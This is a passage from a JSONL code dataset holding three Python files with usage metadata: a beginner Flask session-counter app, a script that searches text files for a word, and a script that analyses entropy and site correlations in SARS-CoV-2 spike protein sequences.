"usage_type": "name"}, {"api_name": "Core.Error.Unauthorized", "line_number": 244, "usage_type": "attribute"}, {"api_name": "Core.Error", "line_number": 244, "usage_type": "name"}, {"api_name": "Utils.Logger.e", "line_number": 246, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 246, "usage_type": "name"}, {"api_name": "LowLevel.DBs.remove_id", "line_number": 248, "usage_type": "call"}, {"api_name": "LowLevel.DBs", "line_number": 248, "usage_type": "name"}, {"api_name": "Core.Error.BadRequest", "line_number": 251, "usage_type": "attribute"}, {"api_name": "Core.Error", "line_number": 251, "usage_type": "name"}, {"api_name": "LowLevel.DBs.remove_id", "line_number": 256, "usage_type": "call"}, {"api_name": "LowLevel.DBs", "line_number": 256, "usage_type": "name"}, {"api_name": "Utils.Logger.e", "line_number": 259, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 259, "usage_type": "name"}, {"api_name": "Core.Error.NotEnoughtRights", "line_number": 266, "usage_type": "attribute"}, {"api_name": "Core.Error", "line_number": 266, "usage_type": "name"}, {"api_name": "LowLevel.DBs.remove_id", "line_number": 267, "usage_type": "call"}, {"api_name": "LowLevel.DBs", "line_number": 267, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 271, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 272, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 272, "usage_type": "name"}, {"api_name": "Utils.Logger.e", "line_number": 273, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 273, "usage_type": "name"}, {"api_name": "Core.Manager.get_prop_id", "line_number": 277, "usage_type": "call"}, {"api_name": "Core.Manager", "line_number": 277, "usage_type": "name"}]} +{"seq_id": "11176631416", "text": "from flask import Flask, render_template, request, redirect, session # Import Flask to allow us to create our app\r\napp = Flask(__name__) # Create a new instance of the Flask class called \"app\"\r\napp.secret_key = 'secret' # set a secret key for security purposes\r\n\r\n@app.route('/')\r\ndef counter():\r\n if \"count\" not in session:\r\n session[\"count\"] = 0\r\n else:\r\n session['count'] += 1\r\n return render_template(\"index.html\")\r\n\r\n@app.route('/destroy_session')\r\ndef reset():\r\n session.clear()\r\n return redirect('/')\r\n\r\n@app.route('/signup')\r\ndef sign_up():\r\n return render_template(\"sign_up.html\")\r\n\r\n@app.route('/users', methods=['POST'])\r\ndef create_user():\r\n print(\"Got Post Info\")\r\n print(request.form)\r\n session['username'] = request.form['name']\r\n session['useremail'] = request.form['email']\r\n return redirect('/show')\r\n\r\n@app.route(\"/show\")\r\ndef show_user():\r\n return render_template('show.html', name_on_template=session['username'], email_on_template=session['useremail'])\r\n\r\nif __name__ == \"__main__\": # Ensure this file is being run directly and not from a different module\r\n app.run(debug=True) # Run the app in debug mode.\r\n\r\n", "repo_name": "cameotom/flask_session_counter", "sub_path": "counter/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 2, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 8, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 10, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.session.clear", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "33946200981", "text": "#!python3\n#takes an input and searches the .txt files in the current directory for the word\n\nimport re, os\nfrom pathlib import Path\n\n# word to search for\nfind = input(\"What word would you like to find?\\n\")\n# gets current directory\np = Path.cwd()\n\n# for regex express\nsearchFor = re.compile(rf\"{find}\")\n\n# collects the files with the word\nfound = []\n\n# loops through the files\nfor file in p.glob('*.txt'):\n openFile = open(file,'r') #opens the file\n readFile = openFile.read() #reads the file\n mo = searchFor.search(readFile) #searchs the file for the word\n if mo != None : #if one instance found the file is added to found\n found.append(os.path.basename(file))\n\nfinal = \" \".join(found) #seprates the files by a space\nif len(found) > 0: #if a file was found\n print(f\"{find} was found in {final}\")\nelse: #if a file was not found\n print(f\"Sorry I couldn't find {find}\")\n\n\n", "repo_name": "jj1here/ATBS-Regex-Files", "sub_path": "search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path.cwd", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 10, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}]} +{"seq_id": "4761476444", "text": "'''\nXSPIKE: eXplore the SPIKE protein sequence in the SARS CoV-2 virus\n'''\n\nimport re\nfrom collections import Counter,defaultdict\nimport numpy as np\nimport random\nimport itertools as it\nfrom scipy import stats\n\nimport matplotlib.pyplot as plt\nimport argparse\n\nimport warnings\n\nfrom verbose import verbose as v\nimport readseq\nfrom spikevariants import SpikeVariants\nfrom hamming import hamming\nimport sequtil\nimport intlist\nimport wrapgen\nimport covid\nimport mutant\n\nfrom xspikeplots import circleplot,heatmap\n\ndef getargs():\n ap = argparse.ArgumentParser(description=__doc__)\n covid.corona_args(ap)\n paa = ap.add_argument\n paa(\"--pairs\",action=\"store_true\",\n help=\"analyze pairwise correlations\")\n paa(\"--allsites\",\n help=\"write fasta file with patterns involving /all/ sites\")\n paa(\"--addsites\",\n help=\"prepend this (comma-separated) list of sites to those being observed\")\n paa(\"--sites\",type=int,default=50,\n help=\"Number of highest-entropy sites to use\")\n paa(\"--baseline\",choices=('Wuhan','BA.2','BA.5'), default=None,\n help=\"Baseline sequences (default is Wuhan)\")\n paa(\"--thresh\",type=int,default=2,\n help=\"Only include patterns that appear at least this many times\")\n paa(\"--entropysamples\",\"-E\",type=int,default=0,\n help=\"For single-site entropy, subsample sequences for faster estimates\")\n paa(\"--cvthresh\",type=int,default=3, ## should maybe just be hardcoded\n help=\"Require this many sequences for each site in the pairwise correlation\")\n paa(\"--plot\",action=\"store_true\",\n help=\"make plots\")\n paa(\"--writeplot\",\n help=\"Write plots to file (instead of showing them on screen)\")\n paa(\"--restrictsites\",\n help=\"Consider only these sites (RBD, NTD, NTD+RBD, or comma-separated list)\")\n paa(\"--nomutlist\",action=\"store_true\",\n help=\"Dont make mutant list at end of lines\")\n paa(\"--colormut\",\n help=\"name of color mutation file (mutation_string,lineage_name) are 2nd,3rd columns\")\n paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n help=\"verbose\")\n args = ap.parse_args()\n return args\n\ndef stripxs_orig(alist,blist,badchar='X'):\n '''given a pair of lists (or strings), strip element n where\n either alist[n]=='X' or blist[n]=='X'\n return pair of tuples\n '''\n ab = [ (a,b) for a,b in zip(alist,blist)\n if a!=badchar and b!=badchar ]\n alist,blist = zip(*ab)\n return alist,blist\n\ndef stripxs(alist,blist,badchar='X'):\n '''given a pair of lists (or strings), strip element n\n from both lists, if either alist[n]=='X' or blist[n]=='X'\n return pair of tuples\n '''\n if badchar in alist or badchar in blist:\n good = [i for i,(a,b) in enumerate(zip(alist,blist))\n if not(a==badchar or b==badchar)]\n alist = [alist[g] for g in good]\n blist = [blist[g] for g in good]\n return alist,blist\n\ndef contingency_table(alist,blist,thresh=3):\n '''convert pair of lists (alist,blist) into a contingency table'''\n alist,blist = stripxs(alist,blist)\n\n acnt = Counter(alist); avals=list(acnt); A=len(acnt)\n bcnt = Counter(blist); bvals=list(bcnt); B=len(bcnt)\n table = np.empty((A,B),dtype=np.int32)\n\n ab = Counter(zip(alist,blist))\n for i,j in it.product(range(A),range(B)):\n table[i,j] = ab[(avals[i],bvals[j])]\n\n def minsum():\n '''return the miniumum sum along all the rows and columns'''\n hsum = [np.sum(table[:,j]) for j in range(table.shape[1])]\n vsum = [np.sum(table[i,:]) for i in range(table.shape[0])]\n return min(hsum + vsum)\n\n if thresh:\n ## Stability (remove rows and columns whose sums are < thresh)\n otable = table.copy()\n while( minsum() < thresh ):\n hok = [np.sum(table[:,j])>=thresh for j in range(table.shape[1])]\n vok = [np.sum(table[i,:])>=thresh for i in range(table.shape[0])]\n table = table[:,hok][vok,:]\n\n ## Check that table is okay\n hzero = [np.sum(table[:,j])==0 for j in range(table.shape[1])]\n vzero = [np.sum(table[i,:])==0 for i in range(table.shape[0])]\n if (np.any( hzero ) or np.any( vzero )): # or min(table.shape)<2 ):\n ## This should never happen\n v.print(\"warning: possible issues with contingency table\")\n v.print(\"len a,b:\",len(alist),len(blist))\n v.print(acnt)\n v.print(bcnt)\n v.print(ab)\n v.print(hzero)\n v.print(vzero)\n v.print(\"Table;\")\n v.print(table)\n if thresh:\n v.print(\"Original Table:\")\n v.print(otable)\n\n return table\n\ndef cramerv(table):\n k = min(table.shape)\n N = np.sum(table)\n try:\n chisq,_,_,_ = stats.chi2_contingency(table,lambda_='pearson')\n except ValueError:\n chisq=0\n v.print(f\"Warning: in chisq k={k}, N={N}\")\n v.print(\"Table:\\n\",table)\n\n return np.sqrt(chisq/(N*max([1,(k-1)])))\n\ndef mutinfo(table):\n return \\\n stats.entropy(np.sum(table,axis=1)) + \\\n stats.entropy(np.sum(table,axis=0)) - \\\n stats.entropy(table.flatten())\n\n\n#############################################################\n\ndef filename_prepend(pre,file):\n ## prepend a string to a file name; eg\n ## \"pre\",\"file\" -> \"prefile\", but also\n ## \"pre\",\"dir/file\" -> \"dir/prefile\"\n if not file:\n return file\n return re.sub(r\"(.*/)?([^/]+)\",r\"\\1\"+pre+r\"\\2\",file)\n\ndef get_title(args,title=None):\n if not title:\n title = covid.get_title(args)\n if args.restrictsites:\n title = title + \" (\" + args.restrictsites + \" only)\"\n return title\n\ndef pairwise(args,esites,charsatsite,mutname,title=None):\n ''' Do pair-wise analysis to get cross-correaltions and mutual entropies '''\n\n title = get_title(args,title=title)\n\n ## Make Cramer V table, and Mutual Info table\n ne = len(esites)\n cvtable = np.zeros((ne,ne))\n mitable = np.zeros((ne,ne))\n for i,j in it.product(range(ne),repeat=2):\n ei,ej = esites[i],esites[j]\n if ei <= ej:\n table = contingency_table(charsatsite[ei],charsatsite[ej],\n thresh=args.cvthresh)\n cvtable[i,j] = cvtable[j,i] = cramerv(table)\n mitable[i,j] = mitable[j,i] = mutinfo(table)\n\n v.vvprint()\n v.vvprint(\"ei,ej:\",ei+1,ej+1)\n v.vvprint(\"cv:\",cvtable[i,j])\n v.vvprint(\"mi:\",mitable[i,j])\n v.vvprint(\"ei:\",Counter(charsatsite[ei]))\n v.vvprint(\"ej:\",Counter(charsatsite[ej]))\n v.vvprint(\"ij:\",Counter(zip(charsatsite[ei],\n charsatsite[ej])))\n v.vvprint(table)\n\n ## Make plots of pairwise correlations\n mnames = [mutname[e] for e in esites]\n nodevalues = np.diag(mitable)\n for plotter,pname in ((heatmap, \"hotmap\"),\n (circleplot,\"circle\")):\n for stat,sname in ((mitable,\"mutinfo\"),\n (cvtable,\"cramerv\")):\n nv = nodevalues if sname == \"cramerv\" else None\n plotter(stat,mnames,nodevalues=nv)\n plt.title(sname + \": \" + title)\n plt.tight_layout()\n if args.writeplot:\n plt.savefig(filename_prepend(pname + \"-\" + sname + \"_\", args.writeplot))\n\n #### Make table of correlated pairs\n print(\"\\nMost highly correlated site-pairs for:\",title)\n print(\" cramerV mutInfo\")\n\n lines=[]\n for i,j in it.combinations(range(ne),2):\n lines.append( (mnames[i],mnames[j],cvtable[i,j],mitable[i,j]) )\n lines = sorted(lines, key=lambda w: (w[3],w[2]),reverse=True)\n for line in lines[:15]:\n print(\"%6s %6s %7.4f %7.4f\" % line)\n print()\n lines = sorted(lines[15:],key=lambda w: (w[2],w[3]),reverse=True)\n for line in lines[:15]:\n print(\"%6s %6s %7.4f %7.4f\" % line)\n\ndef main(args):\n\n ## Get title for plots and tables\n title = get_title(args)\n v.print(\"Running xspike\",title)\n\n allseqs = covid.read_seqfile(args)\n allseqs = vcount(allseqs,\"All sequences:\")\n allseqs = covid.filter_seqs_by_date(allseqs,args)\n allseqs = vcount(allseqs,\"All sequences in date range:\")\n allseqs = covid.fix_seqs(allseqs,args)\n allseqs = list(allseqs)\n seqs = covid.filter_seqs_by_pattern(allseqs,args)\n seqs = vcount(seqs,\"Sequences after filtering by pattern:\")\n\n seqs = list(seqs)\n firstseq = seqs[0].seq\n seqs = seqs[1:]\n\n if len(seqs)==0:\n raise RuntimeError(\"No sequences match pattern\")\n\n N = len(seqs)\n M = len(seqs[0].seq)\n\n print(f\"Evaluating {N} sequences of length {M}\")\n print(\"Sampled from %s to %s.\"\n % covid.range_of_dates(seqs))\n if args.dates:\n print(\"Specified Date Range:\",args.dates)\n\n #### SINGLE-SITE ENTROPY\n v.vprint(\"Single-site entropy...\",end=\"\")\n ## If args.entropysamples, then use subsampling of the sequences to estimate entropy\n sampleseqs = random.choices(seqs,k=args.entropysamples) if N>args.entropysamples>0 else seqs\n E = sequtil.chunked_entropy(sampleseqs)\n v.vprint(\"ok\")\n\n T = mutant.MutationManager(firstseq)\n\n ## Determine which sites will be employed\n esites = intlist.string_to_intlist(args.addsites)\n esites = list(dict.fromkeys(esites)) ## removes dups while maintaining order\n if args.sites:\n ndxtop = [n for n in np.argsort(E)[::-1]]\n if args.restrictsites:\n rsites = covid.spike_sites(args.restrictsites)\n rindices = T.indices_from_sitelist(rsites)\n ndxtop = [n for n in ndxtop if n in rindices]\n ## convert top indices back into top sites\n etopsites = [T.site_from_index(n) for n in ndxtop]\n ## sites of the largest entropy\n esites.extend(etopsites[:args.sites])\n esites = list(dict.fromkeys(esites)) ## removes dups while maintaining order\n\n v.vprint(\"Observing\",len(esites),title)\n v.vprint(\"Observing\",len(esites),\"sites:\",esites)\n v.vprint(\"Observing\",len(esites),\"sites:\",sorted(esites))\n\n ## Make entropy plot\n if args.plot or args.writeplot:\n plt.figure()\n ## entropy vs site for all sites ... in default color (blue)\n siterange = [T.site_from_index(n) for n in range(M)]\n plt.plot(siterange,E)\n #plt.plot(range(1,M+1),E)\n plt.xlabel(\"Site index\")\n plt.ylabel(\"Entropy\")\n plt.title(title)\n ## entropy at specified sites ... in red\n for e in esites:\n ndx = T.index_from_site(e)\n plt.plot([e,e],[0,E[ndx]],'r-')\n\n if args.writeplot:\n plt.savefig(filename_prepend(\"entrpy-\",args.writeplot))\n\n print(\"Highest entropy sites for:\",title)\n print(\" Site Entropy\")\n for e in esites:\n n = T.index_from_site(e)\n print(\"%6d %7.4f\" % (e,E[n]))\n\n #### PAIRWISE ANALYSIS\n if args.pairs:\n charsatsite=dict()\n mutname = dict()\n for e in esites:\n ## don't strip x's quite yet\n n = T.index_from_site(e)\n charsatsite[e] = sequtil.getcolumn(seqs,n,keepx=True)\n mutname[e] = str(e)\n pairwise(args,esites,charsatsite,mutname,title=title)\n\n #### COMMON PATTERNS\n\n ## baseline mutation for mstrings\n base_mut = mutant.Mutation(covid.get_baseline_mstring(args.baseline))\n\n print()\n print(\"Most common patterns for local area, where Local =\",title)\n if not args.nomutlist and args.baseline:\n print(f\"Context is relative to baseline sequence = {args.baseline}: {base_mut}\")\n esites = sorted(esites)\n for lines in intlist.write_numbers_vertically(esites,plusone=0):\n print(lines)\n\n pattseqs = sequtil.copy_seqlist(seqs)\n ndxsites = [T.index_from_site(e) for e in esites]\n for s in pattseqs:\n s.seq = \"\".join(s.seq[n] for n in ndxsites)\n cnt = Counter([s.seq for s in pattseqs])\n\n ## Do not include patterns with X's in them\n ## set count[patt]=0 if \"X\" in patt\n ## one-liner: cnt = { patt: cnt[patt] * bool(\"X\" not in patt) for patt in cnt }\n ## alt: cnt = Counter({patt: cnt[patt] for patt in cnt if 'X' not in patt})\n for patt in cnt:\n if 'X' in patt:\n cnt[patt]=0\n\n patternlist = sorted(cnt, key=cnt.get, reverse=True)\n v.vvprint(\"Sums:\",args.filterbyname,len(seqs),sum(cnt.values()))\n\n #### Get counts for the various continents\n #### Use all the sequences, not just those that fit pattern\n allseqs = list(allseqs)[1:] ## don't keep the reference sequence\n\n cont_cnt = dict() ## cnt's for the various continents\n cont_sum = dict()\n Cxcx = covid.parse_continents()\n for cx,c,x in [(\"Global\",\"Global\",\"\")] + Cxcx:\n cseqs = sequtil.filter_by_pattern(allseqs,c)\n if x:\n cseqs = sequtil.filter_by_pattern_exclude(cseqs,x)\n cseqs = list(cseqs)\n #if c == \"Global\":\n # print(\"Global cseqs=\",len(cseqs))\n\n cont_cnt[c] = Counter(sequtil.multicolumn(cseqs,ndxsites,\n keepx=True))\n cont_sum[c] = len(cseqs)\n v.vvprint(\"Sums:\",c,cont_sum[c],sum(cont_cnt[c].values()))\n\n master = \"\".join(firstseq[n] for n in ndxsites)\n \n print(master,\" Global\",\n \" \".join(\"%6s\" % covid.ABBREV_CONTINENTS[cx] for cx,_,_ in Cxcx),\n \" Local\",\n \" Exact Pct [Context]\" if not args.nomutlist else \"\")\n\n ## Totals do not include sequences with X at any of the high-entropy sites\n print(\" \"*len(master),\"%7d\" % sum(cont_cnt['Global'].values()),\n \" \".join([\"%6d\" % sum(cont_cnt[c].values()) for _,c,_ in Cxcx]),\n \"%7d\"% sum(cnt.values()),\"<----------- Totals\" ) ## Totals\n\n if args.colormut:\n svar = SpikeVariants.from_colormut(args.colormut,refseq=firstseq)\n else:\n svar = SpikeVariants.default(refseq=firstseq)\n def get_lineage(seq):\n vocs = svar.vocmatch(seq)\n return \", \".join(v.name for v in vocs)\n\n ## dict indexes list of full sequences based on pattseq\n pattseqdict=defaultdict(list)\n for ps,s in zip(pattseqs,seqs):\n pattseqdict[ps.seq].append(s)\n\n for p in patternlist:\n\n if \"X\" in p:\n continue\n if cnt[p] < args.thresh:\n break\n print(\"%s %7d \" % (sequtil.relativename(master,p),\n cont_cnt[\"Global\"][p]),end=\"\")\n print(\" \".join(\"%6d\"% cont_cnt[c][p] for _,c,_ in Cxcx),end=\"\")\n print(\" %7d\" % cnt[p],end=\"\")\n\n ## What is the context for this pattern\n if args.nomutlist:\n print()\n else:\n ## count full seq's consistent with pattern p\n pcnt = Counter(s.seq for s in pattseqdict[p])\n [(pcommonseq,npcs)] = pcnt.most_common(1)\n lineage_name = get_lineage(pcommonseq)\n mut = T.get_mutation(pcommonseq)\n mstring = mut.relative_to(base_mut) if args.baseline else str(mut)\n print(f\" {npcs:6d} {100*npcs//cnt[p]:3d}% {mstring} {lineage_name}\")\n\n\n\nif __name__ == \"__main__\":\n\n args = getargs()\n v.verbosity(args.verbose)\n\n def vcount(seqs,*p,**kw):\n if args.verbose:\n return wrapgen.keepcount(seqs,*p,**kw)\n else:\n return seqs\n\n main(args)\n if args.plot:\n plt.show()\n", "repo_name": "jt-lanl/cov-voc", "sub_path": "xspike.py", "file_name": "xspike.py", "file_ext": "py", "file_size_in_byte": 15301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 30, "usage_type": "call"}, {"api_name": "covid.corona_args", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 90, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 92, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 94, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 115, "usage_type": "call"}, {"api_name": "verbose.verbose.print", "line_number": 117, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 117, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 118, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 118, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 119, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 119, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 120, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 120, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 121, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 121, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 122, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 122, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 123, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 123, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 124, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 124, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 125, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 125, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 127, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 127, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 128, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2_contingency", "line_number": 136, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 136, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 139, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 139, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 140, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats.entropy", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 146, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.stats.entropy", "line_number": 147, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 147, "usage_type": "call"}, {"api_name": "scipy.stats.entropy", "line_number": 148, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 148, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 159, "usage_type": "call"}, {"api_name": "covid.get_title", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 176, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 177, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 185, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 185, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 186, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 186, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 187, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 187, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 188, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 188, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 189, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 189, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 189, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 190, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 190, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 190, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 191, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 191, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 191, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 193, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 193, "usage_type": "name"}, {"api_name": "numpy.diag", "line_number": 197, "usage_type": "call"}, {"api_name": "xspikeplots.heatmap", "line_number": 198, "usage_type": "name"}, {"api_name": "xspikeplots.circleplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "itertools.combinations", "line_number": 214, "usage_type": "call"}, {"api_name": "verbose.verbose.print", "line_number": 228, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 228, "usage_type": "name"}, {"api_name": "covid.read_seqfile", "line_number": 230, "usage_type": "call"}, {"api_name": "covid.filter_seqs_by_date", "line_number": 232, "usage_type": "call"}, {"api_name": "covid.fix_seqs", "line_number": 234, "usage_type": "call"}, {"api_name": "covid.filter_seqs_by_pattern", "line_number": 236, "usage_type": "call"}, {"api_name": "covid.range_of_dates", "line_number": 251, "usage_type": "call"}, {"api_name": "verbose.verbose.vprint", "line_number": 256, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 256, "usage_type": "name"}, {"api_name": "random.choices", "line_number": 258, "usage_type": "call"}, {"api_name": "sequtil.chunked_entropy", "line_number": 259, "usage_type": "call"}, {"api_name": "verbose.verbose.vprint", "line_number": 260, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 260, "usage_type": "name"}, {"api_name": "mutant.MutationManager", "line_number": 262, "usage_type": "call"}, {"api_name": "intlist.string_to_intlist", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 268, "usage_type": "call"}, {"api_name": "covid.spike_sites", "line_number": 270, "usage_type": "call"}, {"api_name": "verbose.verbose.vprint", "line_number": 279, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 279, "usage_type": "name"}, {"api_name": "verbose.verbose.vprint", "line_number": 280, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 280, "usage_type": "name"}, {"api_name": "verbose.verbose.vprint", "line_number": 281, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "sequtil.getcolumn", "line_number": 314, "usage_type": "call"}, {"api_name": "mutant.Mutation", "line_number": 321, "usage_type": "call"}, {"api_name": "covid.get_baseline_mstring", "line_number": 321, "usage_type": "call"}, {"api_name": "intlist.write_numbers_vertically", "line_number": 328, "usage_type": "call"}, {"api_name": "sequtil.copy_seqlist", "line_number": 331, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 335, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 346, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 346, "usage_type": "name"}, {"api_name": "covid.parse_continents", "line_number": 354, "usage_type": "call"}, {"api_name": "sequtil.filter_by_pattern", "line_number": 356, "usage_type": "call"}, {"api_name": "sequtil.filter_by_pattern_exclude", "line_number": 358, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 363, "usage_type": "call"}, {"api_name": "sequtil.multicolumn", "line_number": 363, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 366, "usage_type": "call"}, 